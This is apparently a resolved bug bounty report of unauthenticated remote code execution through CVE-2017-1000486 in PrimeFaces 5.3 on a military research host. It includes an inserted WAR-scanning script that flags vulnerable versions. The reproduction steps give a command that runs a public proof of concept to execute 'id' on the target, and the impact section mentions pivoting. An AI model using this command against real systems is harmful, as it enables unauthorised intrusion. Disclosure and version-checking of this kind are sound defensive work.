RCE in ██████ subdomain via CVE-2017-1000486
High
Vulnerability Details
**Summary:**
The application at ████████/ftn-Website/ uses PrimeFaces 5.3, but not 5.3.8, which makes it vulnerable to the unauthenticated RCE tracked as CVE-2017-1000486.
## Step-by-step Reproduction Instructions
1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486
2. Execute: `python primefaces.py ███/ftn-Website/ -c id`
3. Success: `uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0`
## Product, Version, and Configuration (If applicable)
PrimeFaces 5.3
## Suggested Mitigation/Remediation Actions
Update PrimeFaces.
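
To confirm which deployed archives still bundle an affected build, before and after the update, the following added example (not part of the original report or of the PrimeFaces project) scans a WAR for bundled PrimeFaces jars and flags 5.3 releases below 5.3.8, the threshold given in the summary. The `Implementation-Version` manifest header, the function names and the sample WAR are assumptions made for illustration.

```python
import io
import re
import zipfile

FIXED_5_3 = (5, 3, 8)  # from the report: 5.3 releases below 5.3.8 are affected
JAR_RE = re.compile(r"(?:^|/)primefaces-(\d+(?:\.\d+)*)(?:[.-][A-Za-z0-9]+)*\.jar$")
MANIFEST_RE = re.compile(r"^Implementation-Version:\s*(\d+(?:\.\d+)*)", re.M)

def parse_version(text):
    parts = [int(p) for p in text.split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))  # '5.3' -> (5, 3, 0)

def classify(version):
    """Verdict for a version tuple, using only the 5.3 threshold the report gives."""
    if version[:2] == (5, 3):
        return "vulnerable" if version < FIXED_5_3 else "fixed"
    return "review"  # other release lines: consult the CVE advisory

def manifest_version(jar_bytes):
    """Implementation-Version from a jar's manifest, or None if absent or unreadable."""
    try:
        with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
            text = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return None
    m = MANIFEST_RE.search(text)
    return m.group(1) if m else None

def scan_war(war_bytes):
    """[(jar path, version, verdict)] for PrimeFaces jars in a WAR; manifest beats file name."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for name in war.namelist():
            if m := JAR_RE.search(name):
                version = manifest_version(war.read(name)) or m.group(1)
                findings.append((name, version, classify(parse_version(version))))
    return findings

def make_zip(entries):
    """Build an in-memory zip from {path: bytes}, for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for path, data in entries.items():
            z.writestr(path, data)
    return buf.getvalue()

if __name__ == "__main__":  # constructed sample: one WAR bundling primefaces-5.3.jar
    war = make_zip({"WEB-INF/lib/primefaces-5.3.jar": make_zip({"README": b""})})
    print(scan_war(war))
```

A `review` verdict means the jar belongs to a release line for which the report gives no fixed version, so it has to be checked against the CVE advisory.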
## Impact
An unauthenticated third-party attacker can remotely execute code on restsvr1.ftn.research.usafa.edu as the Unix `tomcat` user. Note that this service uses a DoD IP address, suggesting that an attacker could potentially pivot elsewhere afterwards.
Report Stats
- Report ID: 1067291
- State: Closed
- Substate: resolved
- Upvotes: 8